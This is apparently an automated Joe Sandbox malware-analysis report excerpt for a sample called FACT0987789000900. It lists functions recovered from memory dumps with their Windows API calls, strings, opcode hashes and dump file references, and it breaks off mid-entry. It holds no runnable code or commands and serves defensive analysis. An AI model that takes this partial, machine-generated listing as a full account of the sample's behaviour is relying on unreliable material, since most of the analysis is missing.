                                                                                                                • API ID: Error$Mode$DiskFreeLastSpace
                                                                                                                • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                                                                                • API String ID: 4194297153-14809454
                                                                                                                • Opcode ID: e757d8c784b1cf8092a5346aafa15313dca08ebc36f883176586ddaf5d89fde5
                                                                                                                • Instruction ID: 5ab1d84419250db87c792103b87477dff27a3dd4e0082b5b5f48313091d8611d
                                                                                                                • Opcode Fuzzy Hash: e757d8c784b1cf8092a5346aafa15313dca08ebc36f883176586ddaf5d89fde5
                                                                                                                • Instruction Fuzzy Hash: E7316335A002099FDB01EB65D995AEEBBB4EF54308F14802BE505AB391D7789D02CB95
                                                                                                                APIs
                                                                                                                • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 004CB98C
                                                                                                                • GetDlgCtrlID.USER32 ref: 004CB997
                                                                                                                • GetParent.USER32 ref: 004CB9B3
                                                                                                                • SendMessageW.USER32(00000000,?,00000111,?), ref: 004CB9B6
                                                                                                                • GetDlgCtrlID.USER32(?), ref: 004CB9BF
                                                                                                                • GetParent.USER32(?), ref: 004CB9DB
                                                                                                                • SendMessageW.USER32(00000000,?,?,00000111), ref: 004CB9DE
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$CtrlParent
                                                                                                                • String ID: ComboBox$ListBox
                                                                                                                • API String ID: 1383977212-1403004172
                                                                                                                • Opcode ID: 0bee48826d7a9a3879b665690aee8be39489b21ff180c376988d39503b67e684
                                                                                                                • Instruction ID: 8059a754a78a23108deb05f647783672326427b632c2fdf7ddd16bb8e102a768
                                                                                                                • Opcode Fuzzy Hash: 0bee48826d7a9a3879b665690aee8be39489b21ff180c376988d39503b67e684
                                                                                                                • Instruction Fuzzy Hash: D221C1B8900104BFCF04ABA1CC86EFEBB75EF59304F10411EFA51A32A1DB795819DB64
                                                                                                                APIs
                                                                                                                • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 004CBA73
                                                                                                                • GetDlgCtrlID.USER32 ref: 004CBA7E
                                                                                                                • GetParent.USER32 ref: 004CBA9A
                                                                                                                • SendMessageW.USER32(00000000,?,00000111,?), ref: 004CBA9D
                                                                                                                • GetDlgCtrlID.USER32(?), ref: 004CBAA6
                                                                                                                • GetParent.USER32(?), ref: 004CBAC2
                                                                                                                • SendMessageW.USER32(00000000,?,?,00000111), ref: 004CBAC5
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$CtrlParent
                                                                                                                • String ID: ComboBox$ListBox
                                                                                                                • API String ID: 1383977212-1403004172
                                                                                                                • Opcode ID: 366915a4d916b03e99962911ccf84dcd0ec101e2c79accc7807f9d8d3659d563
                                                                                                                • Instruction ID: 3649d93e937383edf0288ecdc43264d77342084cbd143867c7b9b69c4279a6e8
                                                                                                                • Opcode Fuzzy Hash: 366915a4d916b03e99962911ccf84dcd0ec101e2c79accc7807f9d8d3659d563
                                                                                                                • Instruction Fuzzy Hash: 9921D3B8900104BFDF01AB61CC86FFEBB75EF48304F00401AF55193291DBBA9819EB64
                                                                                                                APIs
                                                                                                                • GetParent.USER32 ref: 004CBAE3
                                                                                                                • GetClassNameW.USER32(00000000,?,00000100), ref: 004CBAF8
                                                                                                                • _wcscmp.LIBCMT ref: 004CBB0A
                                                                                                                • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 004CBB85
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ClassMessageNameParentSend_wcscmp
                                                                                                                • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                                                                • API String ID: 1704125052-3381328864
                                                                                                                • Opcode ID: b380374b46dde2f3997f764707f42299ece643d7a814c3b86360bfb22fcd7da0
                                                                                                                • Instruction ID: aab62fd677ab108c3cd4f585720d95ab3261ac9ceb0a62f78d53f23fbf104293
                                                                                                                • Opcode Fuzzy Hash: b380374b46dde2f3997f764707f42299ece643d7a814c3b86360bfb22fcd7da0
                                                                                                                • Instruction Fuzzy Hash: 5411C87A608312F9FA2466219C07EE7376DDB21328F10401BFD04E54D5FB996C12956C
                                                                                                                APIs
                                                                                                                • VariantInit.OLEAUT32(?), ref: 004EB2D5
                                                                                                                • CoInitialize.OLE32(00000000), ref: 004EB302
                                                                                                                • CoUninitialize.COMBASE ref: 004EB30C
                                                                                                                • GetRunningObjectTable.OLE32(00000000,?), ref: 004EB40C
                                                                                                                • SetErrorMode.KERNEL32(00000001,00000029), ref: 004EB539
                                                                                                                • CoGetInstanceFromFile.COMBASE(00000000,?,00000000,00000015,00000002), ref: 004EB56D
                                                                                                                • CoGetObject.OLE32(?,00000000,0051D91C,?), ref: 004EB590
                                                                                                                • SetErrorMode.KERNEL32(00000000), ref: 004EB5A3
                                                                                                                • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 004EB623
                                                                                                                • VariantClear.OLEAUT32(0051D91C), ref: 004EB633
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                                                                                                • String ID:
                                                                                                                • API String ID: 2395222682-0
                                                                                                                • Opcode ID: 753157be4ed7c7b91782ba24485489bf359eec2750480c79d87a7bd974294274
                                                                                                                • Instruction ID: 13ce2b01fce6b54c4a241da90f6dcf7662666fe986f11f3383cb80bc3b5dcf43
                                                                                                                • Opcode Fuzzy Hash: 753157be4ed7c7b91782ba24485489bf359eec2750480c79d87a7bd974294274
                                                                                                                • Instruction Fuzzy Hash: E4C12471608341AFC700DF66C88496BBBE9FF88309F00495EF98A9B251DB75ED05CB96
                                                                                                                APIs
                                                                                                                • __lock.LIBCMT ref: 004BACC1
                                                                                                                  • Part of subcall function 004B7CF4: __mtinitlocknum.LIBCMT ref: 004B7D06
                                                                                                                  • Part of subcall function 004B7CF4: RtlEnterCriticalSection.NTDLL(00000000), ref: 004B7D1F
                                                                                                                • __calloc_crt.LIBCMT ref: 004BACD2
                                                                                                                  • Part of subcall function 004B6986: __calloc_impl.LIBCMT ref: 004B6995
                                                                                                                  • Part of subcall function 004B6986: Sleep.KERNEL32(00000000,000003BC,004AF507,?,0000000E), ref: 004B69AC
                                                                                                                • @_EH4_CallFilterFunc@8.LIBCMT ref: 004BACED
                                                                                                                • GetStartupInfoW.KERNEL32(?,00546E28,00000064,004B5E91,00546C70,00000014), ref: 004BAD46
                                                                                                                • __calloc_crt.LIBCMT ref: 004BAD91
                                                                                                                • GetFileType.KERNEL32(00000001), ref: 004BADD8
                                                                                                                • InitializeCriticalSectionAndSpinCount.KERNEL32(0000000D,00000FA0), ref: 004BAE11
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CriticalSection__calloc_crt$CallCountEnterFileFilterFunc@8InfoInitializeSleepSpinStartupType__calloc_impl__lock__mtinitlocknum
                                                                                                                • String ID:
                                                                                                                • API String ID: 1426640281-0
                                                                                                                • Opcode ID: e7ce171b48a65e3a425a76a3d2b72af341d571adeac2585f7fe0832c0d54263e
                                                                                                                • Instruction ID: b77daa0505cee882ed724df186435ab27371c0fde610eeae2cfcdd44c7dbd888
                                                                                                                • Opcode Fuzzy Hash: e7ce171b48a65e3a425a76a3d2b72af341d571adeac2585f7fe0832c0d54263e
                                                                                                                • Instruction Fuzzy Hash: 4981E3719053458FDB24CF68C8805EEBBF0AF16324B24425ED4A6AB3D1C738D817DB6A
                                                                                                                APIs
                                                                                                                • __swprintf.LIBCMT ref: 004D67FD
                                                                                                                • __swprintf.LIBCMT ref: 004D680A
                                                                                                                  • Part of subcall function 004B172B: __woutput_l.LIBCMT ref: 004B1784
                                                                                                                • FindResourceW.KERNEL32(?,?,0000000E), ref: 004D6834
                                                                                                                • LoadResource.KERNEL32(?,00000000), ref: 004D6840
                                                                                                                • LockResource.KERNEL32(00000000), ref: 004D684D
                                                                                                                • FindResourceW.KERNEL32(?,?,00000003), ref: 004D686D
                                                                                                                • LoadResource.KERNEL32(?,00000000), ref: 004D687F
                                                                                                                • SizeofResource.KERNEL32(?,00000000), ref: 004D688E
                                                                                                                • LockResource.KERNEL32(?), ref: 004D689A
                                                                                                                • CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 004D68F9
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
                                                                                                                • String ID:
                                                                                                                • API String ID: 1433390588-0
                                                                                                                • Opcode ID: 1fced03fcce7a4dd89a23df49dd4ac6ca8a9ec12c0a7c1e284775ae03115727b
                                                                                                                • Instruction ID: fd736582d302aaba35d88caa67709fe64590d2dc0fd90462175b72f83b70736f
                                                                                                                • Opcode Fuzzy Hash: 1fced03fcce7a4dd89a23df49dd4ac6ca8a9ec12c0a7c1e284775ae03115727b
                                                                                                                • Instruction Fuzzy Hash: CE31827590121AABDB10AF61DD65AFF7BB8EF08341B018427F911D2250E738D915EB74
                                                                                                                APIs
                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 004D4047
                                                                                                                • GetForegroundWindow.USER32(00000000,?,?,?,?,?,004D30A5,?,00000001), ref: 004D405B
                                                                                                                • GetWindowThreadProcessId.USER32(00000000), ref: 004D4062
                                                                                                                • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,004D30A5,?,00000001), ref: 004D4071
                                                                                                                • GetWindowThreadProcessId.USER32(?,00000000), ref: 004D4083
                                                                                                                • AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,004D30A5,?,00000001), ref: 004D409C
                                                                                                                • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,004D30A5,?,00000001), ref: 004D40AE
                                                                                                                • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,004D30A5,?,00000001), ref: 004D40F3
                                                                                                                • AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,004D30A5,?,00000001), ref: 004D4108
                                                                                                                • AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,004D30A5,?,00000001), ref: 004D4113
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                                                                • String ID:
                                                                                                                • API String ID: 2156557900-0
                                                                                                                • Opcode ID: 50b1d9c6af58fc1eba208be99155d343c1bf4e41d4635a22ec7c1ef708ae94cf
                                                                                                                • Instruction ID: 07d1ed9516487cd68208d269e2e7ab4caf871d85ece96e700bc7720b13fb1239
                                                                                                                • Opcode Fuzzy Hash: 50b1d9c6af58fc1eba208be99155d343c1bf4e41d4635a22ec7c1ef708ae94cf
                                                                                                                • Instruction Fuzzy Hash: AD318171500204ABDB11DB54DC69BAE77B9AFB4352F10C017F909D6390CBB89D88AB68
                                                                                                                APIs
                                                                                                                • EnumChildWindows.USER32(?,004CCF50), ref: 004CCE90
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ChildEnumWindows
                                                                                                                • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                                                                                • API String ID: 3555792229-1603158881
                                                                                                                • Opcode ID: 1b3e9b1054333c48f9df1cceb526fc153d984e01a8d1f4c47ebd8b2a7a1e87ea
                                                                                                                • Instruction ID: ae11abc2f3fe497c56561f39335a42e5b1cd730a175fe29c3c63e3364d3def7e
                                                                                                                • Opcode Fuzzy Hash: 1b3e9b1054333c48f9df1cceb526fc153d984e01a8d1f4c47ebd8b2a7a1e87ea
                                                                                                                • Instruction Fuzzy Hash: FE918F34600106AACB58EF61C4C1BEAFB65FF05308F50852FE45EA7251DF38695ADBE8
                                                                                                                APIs
                                                                                                                • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 004930DC
                                                                                                                • CoUninitialize.COMBASE ref: 00493181
                                                                                                                • UnregisterHotKey.USER32(?), ref: 004932A9
                                                                                                                • DestroyWindow.USER32(?), ref: 00505079
                                                                                                                • FreeLibrary.KERNEL32(?), ref: 005050F8
                                                                                                                • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00505125
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                                                                                • String ID: close all
                                                                                                                • API String ID: 469580280-3243417748
                                                                                                                • Opcode ID: 59922bedb7fdef349c9039961517d3ce68dba55f1303af7b1ac4938b87492d38
                                                                                                                • Instruction ID: 78cc560b4fb6b09a0a11873a9a39bb80a72857add7523b892d54722facd452a5
                                                                                                                • Opcode Fuzzy Hash: 59922bedb7fdef349c9039961517d3ce68dba55f1303af7b1ac4938b87492d38
                                                                                                                • Instruction Fuzzy Hash: 3C9150346001029FCB15EF15D899B69FBB4FF15309F5481BEE40A672A2DB38AE16CF58
                                                                                                                APIs
                                                                                                                • SetWindowLongW.USER32(?,000000EB), ref: 004ACC15
                                                                                                                  • Part of subcall function 004ACCCD: GetClientRect.USER32(?,?), ref: 004ACCF6
                                                                                                                  • Part of subcall function 004ACCCD: GetWindowRect.USER32(?,?), ref: 004ACD37
                                                                                                                  • Part of subcall function 004ACCCD: ScreenToClient.USER32(?,?), ref: 004ACD5F
                                                                                                                • GetDC.USER32 ref: 0050D137
                                                                                                                • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 0050D14A
                                                                                                                • SelectObject.GDI32(00000000,00000000), ref: 0050D158
                                                                                                                • SelectObject.GDI32(00000000,00000000), ref: 0050D16D
                                                                                                                • ReleaseDC.USER32(?,00000000), ref: 0050D175
                                                                                                                • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 0050D200
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                                                                                • String ID: U
                                                                                                                • API String ID: 4009187628-3372436214
                                                                                                                • Opcode ID: 9dac8acb984eede6d1d2087e97c94d5837c63bbc850106270f21537ba1aeab07
                                                                                                                • Instruction ID: 5a23a46b94b0e6ceb78bac387537783ebf697971ed335cde3310025a0c58d76a
                                                                                                                • Opcode Fuzzy Hash: 9dac8acb984eede6d1d2087e97c94d5837c63bbc850106270f21537ba1aeab07
                                                                                                                • Instruction Fuzzy Hash: 5371FD30400209DFCF218FA4C895AEE7FB1FF69324F18462AED595A2A6DB358841DF64
                                                                                                                APIs
                                                                                                                • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 004F9B19
                                                                                                                • SendMessageW.USER32(?,00001036,00000000,?), ref: 004F9B2D
                                                                                                                • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 004F9B47
                                                                                                                • _wcscat.LIBCMT ref: 004F9BA2
                                                                                                                • SendMessageW.USER32(?,00001057,00000000,?), ref: 004F9BB9
                                                                                                                • SendMessageW.USER32(?,00001061,?,0000000F), ref: 004F9BE7
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$Window_wcscat
                                                                                                                • String ID: -----$SysListView32
                                                                                                                • API String ID: 307300125-3975388722
                                                                                                                • Opcode ID: fc904504f1062c83e69a5686fe6e5f63b828798af0efb914648a8d12a17260c0
                                                                                                                • Instruction ID: e482f47e1f5fe0a1909c5cd12c870849df37c4906c27140e5c974bd448e0dfaa
                                                                                                                • Opcode Fuzzy Hash: fc904504f1062c83e69a5686fe6e5f63b828798af0efb914648a8d12a17260c0
                                                                                                                • Instruction Fuzzy Hash: FD41C17090034CABDB219FA4CC85BEF7BB8EF08354F10442AF645A7291C7759D84CB68
                                                                                                                APIs
                                                                                                                • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 004E45FF
                                                                                                                • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 004E462B
                                                                                                                • InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 004E466D
                                                                                                                • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 004E4682
                                                                                                                • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 004E468F
                                                                                                                • HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 004E46BF
                                                                                                                • InternetCloseHandle.WININET(00000000), ref: 004E4706
                                                                                                                  • Part of subcall function 004E5052: GetLastError.KERNEL32(?,?,004E43CC,00000000,00000000,00000001), ref: 004E5067
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorHandleInfoLastOpenSend
